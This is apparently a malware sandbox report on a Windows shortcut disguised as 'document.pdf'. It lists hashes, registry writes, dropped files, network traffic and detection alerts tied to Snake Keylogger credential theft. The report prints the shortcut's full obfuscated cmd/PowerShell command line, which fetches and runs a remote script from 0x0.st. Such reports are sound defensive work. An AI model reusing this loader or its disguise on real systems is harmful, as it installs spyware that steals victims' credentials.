File name:	.lnk
Full analysis:	https://app.any.run/tasks/44561158-5c0e-4ee7-a4ac-d37574e36269
Verdict:	Malicious activity
Threats:	A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 19, 2025, 06:40:43
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	evasion snake keylogger stealer susp-powershell
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon, Archive, ctime=Thu Jan 16 17:34:21 2025, atime=Thu Jan 16 17:34:21 2025, mtime=Thu Jan 16 17:34:21 2025, length=278528, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:	827EC9A77B972D4467144FB8A4E59065
SHA1:	746477AE49748524DBE606665DCBB3467F9F8886
SHA256:	FCD67519F34EA85F3FB2ED343CD84D20A97DA2B2E50838470F8769130B73E338
SSDEEP:	48:8BTUnMJXr1QqsW6YxSn9TDuJbf4mIA+5MwJDrOsaEHhfEsVUBpbtib9Wh6daXuHc:8BdX+d1ZCVg1OwJGQPV4iR4dueM

Flags:	IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	Archive
CreateDate:	2025:01:16 17:34:21+00:00
AccessDate:	2025:01:16 17:34:21+00:00
ModifyDate:	2025:01:16 17:34:21+00:00
TargetFileSize:	278528
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	cmd.exe
DriveType:	Fixed Disk
DriveSerialNumber:	B439-BFAE
VolumeLabel:	Windows Server
LocalBasePath:	C:\Windows\System32\cmd.exe
Description:	document.pdf
RelativePath:	..\..\..\Windows\System32\cmd.exe
CommandLineArguments:	cmd /v:on /c "set var1=po^wersh^ell& set var2=-Win^dowS^tyle& set var3=Hid^den& set var4=-En^codedCom^mand& set var5=CgAKACQAQQAxAD0AWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADUAbABkAEMANQBYAFoAVwBKAEQAYgBHAGwAbABiAG4AUQA9ACcAKQApAAoACgAKACQAQQAyAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgACgAJABBADEAKQAKAAoACgAkAEEAMwA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAUgBHADkAMwBiAG0AeAB2AFkAVwBSAFQAZABIAEoAcABiAG0AYwA9ACcAKQApAAoACgAKACQAQQA1AD0AIgBoAHQAdABwAHMAOgAvAC8AMAB4ADAALgBzAHQALwA4AGIAdwAyAC4AdAB4AHQAIgAKAAoACgAkAEEANgA9ACQAQQAyAC4AJABBADMAKAAkAEEANQApAAoACgAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAQQA2AAoACgAgACAAIAAgAA==& !var1! !var2! !var3! !var4! !var5!"
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID:	server97582


(PID) Process:	(6724) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:	write	Name:	Acrobat.Document.DC
Value:
(PID) Process:	(7008) Acrobat.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:	write	Name:	DisplayName
Value: Adobe Acrobat Reader Protected Mode
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:	write	Name:	bLastExitNormal
Value: 0
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	bSynchronizeOPL
Value: 0
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	uLastAppLaunchTimeStamp
Value: 485510120
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	iNumAcrobatLaunches
Value: 7
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\NoTimeOut
Operation:	write	Name:	smailto
Value: 5900
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ToolsSearch
Operation:	write	Name:	iSearchHintIndex
Value: 3
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AdobeViewer
Operation:	delete value	Name:	ProductInfoCache
Value:
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AdobeViewer
Operation:	write	Name:	EULAAcceptedForBrowser
Value: 1

PID	Process	Filename		Type
5736	AcroCEF.exe	C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old		text
		MD5:EB1590F2607E1CE46DBF6A521F772EA0	SHA256:4355D9A8A115BA4E41178B456A8A5578846EB1F7EC9509249C2405F758F31731
6336	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e0bodjtj.tuk.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7084	cscript.exe	C:\Users\admin\AppData\Local\Temp\EWVm.bat		text
		MD5:F6D052E977E9C552C03225F298A63B2F	SHA256:94700A41A4F8DF1AB648830505B51F9390832325303D9EAF10E33C7A5E7AB47F
6724	powershell.exe	C:\Users\admin\AppData\Local\Temp\PO_Swift%20Payment.pdf		pdf
		MD5:4F05F4D6A8B774B70CE538BE803E35B4	SHA256:97FF7F09C6ADBD76F24C7F97E63F73C343E12D520B1FB9C50246762BD4CF96EE
6724	powershell.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive		binary
		MD5:48E894773FF0F7CF7CCB00FC401EB556	SHA256:82B94A99015B9E5E09FB37186EF5E9E8E144817CE4798341787C071424263790
6724	powershell.exe	C:\Users\admin\AppData\Local\Temp\tmpA0E7.vbs		text
		MD5:B219C1AB04007F3E703A8AB522C74214	SHA256:21FEF96BACA12A68D06628FFBA19CB88659BDF9F2D4674377556F8339F4B9851
6336	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sqgrw1nc.4gr.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6300	Acrobat.exe	C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6300		binary
		MD5:366B140BAFC863B7E366AA1E51604759	SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
7008	Acrobat.exe	C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst		binary
		MD5:366B140BAFC863B7E366AA1E51604759	SHA256:CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
6300	Acrobat.exe	C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING		binary
		MD5:DC84B0D741E5BEAE8070013ADDCC8C28	SHA256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4712	MoUsoCoreWorker.exe	GET	200	2.16.164.9:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	23.219.150.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	401	13.107.6.158:443	https://business.bing.com/api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox	unknown	—	—	unknown
—	—	OPTIONS	204	52.6.155.20:443	https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64	unknown	—	—	unknown
—	—	GET	304	13.107.21.239:443	https://edge.microsoft.com/abusiveadblocking/api/v1/blocklist	unknown	—	—	unknown
—	—	GET	200	148.135.107.234:443	https://burtintemational.com/PO_Swift%20Payment.pdf	unknown	pdf	24.9 Kb	unknown
—	—	GET	200	168.119.145.117:443	https://0x0.st/8bw2.txt	unknown	text	75.2 Kb	unknown
—	—	GET	429	13.107.6.158:443	https://business.bing.com/work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox	unknown	binary	359 b	whitelisted
—	—	GET	200	13.107.42.16:443	https://config.edge.skype.com/config/v1/Edge/122.0.2365.59?clientId=4489578223053569932&agents=EdgeFirstRun%2CEdgeFirstRunConfig&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=44&mngd=0&installdate=1661339457&edu=0&bphint=2&soobedate=1504771245&fg=1	unknown	binary	768 b	whitelisted
—	—	GET	200	13.107.21.239:443	https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=122.0.2365.59&experimentationmode=2&scpguard=0&scpfull=0&scpver=0	unknown	binary	184 b	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
4712	MoUsoCoreWorker.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
—	—	2.19.96.130:443	www.bing.com	Akamai International B.V.	DE	whitelisted
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4712	MoUsoCoreWorker.exe	2.16.164.9:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
4712	MoUsoCoreWorker.exe	23.219.150.101:80	www.microsoft.com	AKAMAI-AS	CL	whitelisted
4712	MoUsoCoreWorker.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6724	powershell.exe	168.119.145.117:443	0x0.st	Hetzner Online GmbH	DE	suspicious
3976	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 51.104.136.2 4.231.128.59	whitelisted
www.bing.com	2.19.96.130 2.19.96.16 2.19.96.96 2.19.96.18 2.19.96.88 2.19.96.91 2.19.96.128 2.19.96.90 2.19.96.120 23.15.178.211 23.15.178.218 23.15.178.194 23.15.178.200 23.15.178.216 23.15.178.201 23.15.178.210 23.15.178.202 23.15.178.203 23.15.178.242 23.15.178.248 23.15.178.234 23.15.178.251 23.15.178.233 23.15.178.250 23.15.178.219 23.15.178.232 23.15.178.249 23.15.178.170 23.15.178.185 23.15.178.163 23.15.178.193 23.15.178.192 23.15.178.176 23.15.178.178 23.15.178.179	whitelisted
google.com	142.250.185.238	whitelisted
crl.microsoft.com	2.16.164.9 2.16.164.106	whitelisted
www.microsoft.com	23.219.150.101	whitelisted
0x0.st	168.119.145.117	unknown
burtintemational.com	148.135.107.234	unknown
geo2.adobe.com	104.115.88.161	whitelisted
config.edge.skype.com	13.107.42.16	whitelisted
zunigarquitectura.com	201.148.104.141	unknown

PID	Process	Class	Message
2192	svchost.exe	Misc activity	ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
6724	powershell.exe	Misc activity	ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
—	—	Not Suspicious Traffic	ET INFO Windows Powershell User-Agent Usage
—	—	Misc activity	ET INFO Request for PDF via PowerShell
6336	powershell.exe	Misc activity	ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
—	—	Not Suspicious Traffic	ET INFO Windows Powershell User-Agent Usage
2192	svchost.exe	Device Retrieving External IP Address Detected	ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
6336	powershell.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup - checkip.dyndns.org
6336	powershell.exe	Device Retrieving External IP Address Detected	ET INFO 404/Snake/Matiex Keylogger Style External IP Check
2192	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)

General Info

.lnk

827EC9A77B972D4467144FB8A4E59065

746477AE49748524DBE606665DCBB3467F9F8886

FCD67519F34EA85F3FB2ED343CD84D20A97DA2B2E50838470F8769130B73E338

48:8BTUnMJXr1QqsW6YxSn9TDuJbf4mIA+5MwJDrOsaEHhfEsVUBpbtib9Wh6daXuHc:8BdX+d1ZCVg1OwJGQPV4iR4dueM

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

Uses AES cipher (POWERSHELL)

Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

Dynamically loads an assembly (POWERSHELL)

Create files in the Startup directory

Request from PowerShell which ran from CMD.EXE

SNAKEKEYLOGGER has been detected (SURICATA)

Actions looks like stealing of personal data

Steals credentials from Web Browsers

Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

SUSPICIOUS

BASE64 encoded PowerShell command has been detected

Starts POWERSHELL.EXE for commands execution

Gets file extension (POWERSHELL)

Base64-obfuscated command line is found

Writes data into a file (POWERSHELL)

Uses base64 encoding (POWERSHELL)

The process executes VB scripts

Starts CMD.EXE for commands execution

Application launched itself

Executing commands from a ".bat" file

Writes binary data to a Stream object (SCRIPT)

Creates FileSystem object to access computer's file system (SCRIPT)

Runs shell command (SCRIPT)

Checks for external IP

The process verifies whether the antivirus software is installed

Connects to SMTP port

INFO

Disables trace logs

Uses string split method (POWERSHELL)

Checks proxy server information

Application launched itself

Manual execution by a user

Reads security settings of Internet Explorer

Create files in a temporary directory

Found Base64 encoded text manipulation via PowerShell (YARA)

Found Base64 encoded file access via PowerShell (YARA)

Found Base64 encoded reflection usage via PowerShell (YARA)

Found Base64 encoded encryption-related PowerShell classes (YARA)

Found Base64 encoded compression PowerShell classes (YARA)

Checks current location (POWERSHELL)

Checks supported languages

Reads Environment values

Uses string replace method (POWERSHELL)

Reads the computer name

Converts byte array into ASCII string (POWERSHELL)

Gets data length (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information